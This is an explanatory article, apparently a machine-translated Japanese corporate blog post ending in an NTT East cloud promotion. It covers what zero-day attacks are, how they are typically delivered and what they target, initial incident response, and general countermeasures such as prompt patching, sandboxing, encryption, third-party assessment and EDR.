A zero-day attack is a cyber-attack that targets a vulnerability in an OS or software that has insufficient programmatic security (vulnerability) before a patch is released to reinforce that vulnerability. is.
Vulnerabilities inevitably occur in OSs and software that consists of complex programs. When the developer receives a report of a vulnerability from a user, it promptly publishes a patch to fix it.
- Inevitably there will be a time lag until the patch is released
- Attackers may find vulnerabilities before developers
For these reasons, there are cases where it develops into a zero-day attack.
A zero-day attack can cause damage such as unauthorized access to take over a computer or internal system, or infection with malware to steal or destroy data.
In today’s IT age, any company is at risk of becoming a target of zero-day attacks.
In the latest ” 10 Major Threats to Information Security 2022 ” announced by the Information-technology Promotion Agency (IPA), the fact that it appeared for the first time and ranked in 7th place shows how many threats we should be prepared for now.
Here are five recommended ways to combat zero-day attacks:
| 5 Best Ways to Fight Zero-Day Attacks |
|---|
|
In this article, we will explain the basic knowledge and countermeasures that you need to know to be able to take appropriate countermeasures against zero-day attacks.
[Contents of this article]
- What is a zero-day attack?
- Impact of a zero-day attack
- Typical examples of zero-day attacks targeting vulnerabilities
- What to do if you are hit by a zero-day attack
- How to combat zero-day attacks
By understanding these points, you will be able to correctly understand what a zero-day attack looks like and take necessary countermeasures for your company.
To avoid irreversible situations such as information leaks and system shutdowns, as long as you use IT tools, be sure to understand typical cyberattacks and take proper countermeasures.
1. What is a zero-day attack?
A zero-day attack is a type of cyberattack that exploits vulnerabilities (security holes) in operating systems and software.
Zero-day means 0 days.
It is called a zero-day attack because it is launched before the first day (day 0) when the patch, w countermeasure for the vulnerability, becomes available for download.
For example, if a vulnerability is found in the operating system of an internal system, a zero-day attack could steal all the information in the system.
*What is a vulnerability (security hole)?
- A part where security is low due to program flaws in the OS or software
- If vulnerabilities (security holes) are left unattended, they can be easily infected with viruses or accessed illegally, so it is necessary to apply correction programs (patches) as soon as possible.
- In addition, the vulnerability itself is not uncommon, and although there are differences in severity, it is common, so basically it is important to apply it as soon as the developer releases a patch or update.
Zero-day attacks have a unique timing, but the details and routes of attacks are not much different from general cyberattacks. To protect an organization from zero-day attacks, it is important to understand the characteristics and examples of attacks and thoroughly implement basic countermeasures against cyberattacks.
1-1. Why are zero-day attacks troublesome?
Zero-day attacks are often said to be nasty. This is because it is difficult to completely prevent attacks and to quickly notice that an attack has occurred.
| Characteristics of zero-day attacks | |
|---|---|
| It is difficult to completely prevent attacks |
|
| It is difficult to quickly notice that you have been attacked |
|
To counter zero-day attacks, which are difficult to completely prevent by frequent updates and the introduction of security software, it is necessary to combine fundamental measures such as encrypting important data to be stored. Details of countermeasures will be explained in ” 5. Countermeasures against zero-day attacks “.
1-2. [Latest Trends] Zero-day attacks ranked 7th among the top 10 information security threats
Even in the latest results of IPA’s “Top 10 Information Security Threats,” which are determined based on actual incidents that have a major impact on society, zero-day attacks were ranked 7th for the first time.
| [Latest] 10 major information security threats in organizations | |
|---|---|
| First place | ransomware |
| 2nd place | targeted attack |
| 3rd place | The exploitation of supply chain weaknesses |
| 4th | Attacks targeting telework, etc. |
| 5th place | Information leak by an insider |
| 6th place | Attacks at the timing of vulnerability information disclosure |
| 7th place | zero-day attack |
| 8th place | email scam |
| 9th place | IT infrastructure failure |
| 10th | Information leakage due to negligence |
Any company that uses the Internet and IT tools in its business is subject to zero-day attacks. To avoid unexpected damage, be sure to understand the attack method, etc. properly.
1-3. Common zero-day attack methods
A common zero-day attack method is
(1) Send an email with malware attached
(2) Tampering with the website to trick the viewer into downloading a file containing malware
There are two types of
| Typical methods of zero-day attacks | |
|---|---|
| (1) E-mail with malware attached |
|
| (2) Website defacement |
|
In zero-day attacks, the malware installed in these emails and websites is of the type that targets vulnerabilities before the patch is released.
Given the standard attack methods,
- Do not open e-mail attachments carelessly, even if they are from acquaintances such as business partners.
- Do not open websites that are not related to work
Such self-defense measures can be effective.
2. Two types of damage caused by zero-day attacks
The most common types of damage caused by a zero-day attack are (1) unauthorized access and (2) malware infection.
| Specific examples of zero-day attacks | |
|---|---|
| (1) Unauthorized access | 【Concrete example】
|
| [Case example] A specific shared folder was attacked by a zero-day attack, and as a result of unauthorized access, the personal information of 200 people was leaked. In this case, a vulnerability was targeted that the developer was not yet aware of. |
|
| (2) Malware infection | 【Concrete example】
|
| [Case example] A large-scale incident occurred in which a manufacturer was hacked into its internal system by a zero-day attack, resulting in the leakage of thousands of personal information. In this case, the attacker used a zero-day attack to infiltrate the internal system and then spread malware throughout the company through the system to steal a large amount of information. |
|
In this way, if zero-day attacks cannot be completely prevented, there is a risk of various damages occurring, such as the system becoming unusable, being hijacked, and information being leaked.
3. Three programs that are likely to be targeted by zero-day attacks and countermeasures
Typical examples of programs targeted for vulnerabilities in zero-day attacks so far include:
| Specific examples of programs targeted for vulnerabilities in zero-day attacks |
|---|
|
Large-scale zero-day attacks tend to occur in open-source programs and programs with many users and products.
Given this trend,
- Actively adopting open source programs
- Digitization is progressing rapidly
- We are promoting a work style that is not bound by location, making use of the Internet such as telework.
It can be said that such companies tend to be more likely to be targets of zero-day attacks.
Now, let’s take a closer look at each program targeted for the vulnerability.
3-1.OS
By zero-day attacking OS vulnerabilities, you can create a backdoor and hijack devices. For example, it would be possible to:
- Hijacking a computer to extract information or spread malware
- abuse your webcam
- Check your router credentials
[How to counter such threats? ]
- Thorough basic security measures such as installing security software and prompt OS updates
- Regularly check information about vulnerabilities and cyberattacks
- Understand what software is used in which devices you own, and understand the scope of impact of zero-day attacks
- Monitor network activity daily
3-2.Web browser
The web browsers you open when browsing the Internet have been targeted by zero-day attacks many times in the past.
Examples of zero-day attacks targeting vulnerabilities in web browsers include attempts to hijack PCs of online exchanges by combining them with targeted email attacks.
At this time, the exchange side responded promptly, so I got it without incident.
Even web browsers developed and provided by major companies are no exception, and if a vulnerability is exploited, the connected computer will also be at risk, so caution is required.
[How to counter such threats? ]
- Keep track of web browser usage across your organization
- Gather information about vulnerabilities in your web browser
- Thorough basic security measures such as installing security software and prompt OS updates
- Monitor network connection logs daily
3-3. Server software
Zero-day attacks targeting server software, software that provides various functions and data, such as sending and receiving messages and databases, are also common.
There were signs of a zero-day attack on the server software provided by the manufacturer, which is capable of sending and receiving e-mail. Although the actual damage was not serious, there was a risk of various damages such as setting up a backdoor to steal data and scanning communication contents.
[How to counter such threats? ]
- Know what software your organization uses
- Collect information about the vulnerabilities of the software you use
- Temporarily stop using if you determine that the risk of zero-day attacks is high
4. What to do in the event of a zero-day attack
The initial response when it is discovered that a zero-day attack has been carried out is as follows.
| What to do if you are hit by a zero-day attack |
|---|
|
1. Disconnect from the network 2. Contact the department that manages security 3. Scan and remove with security software |
Whether or not you can take an appropriate initial response will determine whether you can minimize the damage or allow it to expand, so be sure to understand what you should do in normal times.
4-1. Disconnect from network
The first thing to do after a zero-day attack is to disconnect the affected device, site, etc.
Specifically, take the following actions.
- disconnect from the internet
- disconnect from the company network
- If it is a site, it will be closed immediately
In addition to preventing access by attackers, it is also important to prevent the infection from spreading to other devices and users.
4-2. Contact the department that manages security
If you can isolate it from the network and prevent further damage from spreading, contact your company’s security management department as soon as possible.
It is necessary to explain the history from the discovery of the attack to the present and the current response status (such as isolating the attacked terminal) to the management department, but the point is to get the first report as soon as possible.
In the event of malware infection, unauthorized access, or information leakage, it will be necessary to report to the Security Measures Committee, so please discuss with the management department, how to proceed with the response.
You can check the report format and other information on the Information-technology Promotion Agency (IPA) website.
4-3. Scan and remove with security software
Once you have shared the information with the internal security management department, check the detailed infection status and damage status, and if it is infected with malware, etc., remove it. Malware detection and removal can be done with security software and tools.
In some cases, the security software cannot handle it and initialization is required. However, if you initialize it, you can recover the system and devices, and at the same time, traces of intrusion (logs, etc.) will disappear, so please consider it after consulting with the security management department.
In addition, it is important to regularly back up necessary data daily, considering that there are cases where it is initialized after a zero-day attack.
5. How to combat zero-day attacks
Here are five recommended ways to combat zero-day attacks:
| 5 main ways to combat zero-day attacks |
|---|
|
Let’s check what kind of measures are taken.
5-1. Thorough implementation of basic measures
The first thing to do is to thoroughly implement the following three basic measures :
- Apply OS and software updates as soon as they are released
- Install security software
- Do not access unknown attachments, links, etc.
If these three are not thoroughly implemented, it will be impossible to prevent cyberattacks in general before zero-day attacks. Let’s remember that “it is important to firmly grasp the basics even in security measures”.
5-2. Install sandbox environment
A sandbox is an area in which the exchange of data with the outside world is strictly controlled. It’s an isolated area, so even if you open data infected with malware, it won’t affect anything outside the sandbox.
Even if you have to open and check data that you are not sure whether it is safe or not, you can safely check it by trying it in the sandbox.
Even if you are told to carefully consider unknown data, in a business environment where you may have no choice but to open it, preparing such a sandbox will provide both safety and convenience.
5-3. Encrypt and isolate important information
To prepare for zero-day attacks, which are difficult to prevent completely, it is essential to have a mechanism to limit the damage in the unlikely event that an attack cannot be completely prevented. Therefore, what you should do is encrypt and isolate important information.
If you have to store data in an area susceptible to zero-day attacks, keep it encrypted. In addition, it is important to store data that should not be exfiltrated in an isolated area, not in an area that is likely to be affected by a zero-day attack.
5-4. Have a third party confirm the presence or absence of vulnerabilities
It is also recommended to have a third party who is familiar with security, such as a professional contractor, check whether there are any vulnerabilities in the current security.
If countermeasures are taken only in-house, there is a danger that fatal vulnerabilities will remain unaddressed from the perspective of hackers who carry out cyber attacks.
If you don’t have a cybersecurity-savvy department in your company, consider a third-party vulnerability assessment.
5-5. Introduce EDR products
In the unlikely event that a zero-day attack cannot be completely prevented, it is safe to install an EDR product as a countermeasure. EDR is an abbreviation for Endpoint Detection and Response, which means a detection and reporting system at the end of the network.
By installing EDR on each device, in addition to detecting and reporting abnormal behavior, it is possible to isolate and stop the system.
Since you can quickly respond to suspicious movements, even if you are attacked by a zero-day attack, you will be able to suppress it immediately.
| If you want to always use the cloud with the latest security, please consult NTT East |
|---|
“I want to use cloud services, but I’m worried about whether they can handle zero-day attacks.” If you think so, we recommend NTT East’s cloud introduction and operation for AWS / Microsoft Azure.
|
6. Summary
A zero-day attack is a cyber-attack that exploits a vulnerability in a program before a patch to fix it is released. It is called a zero-day attack because it attacks the 0th day before the 1st day when the patch for the vulnerability becomes available for download.
If zero-day attacks cannot be completely prevented, there is a risk of various damages such as the system becoming unusable, being hijacked, and information being leaked.
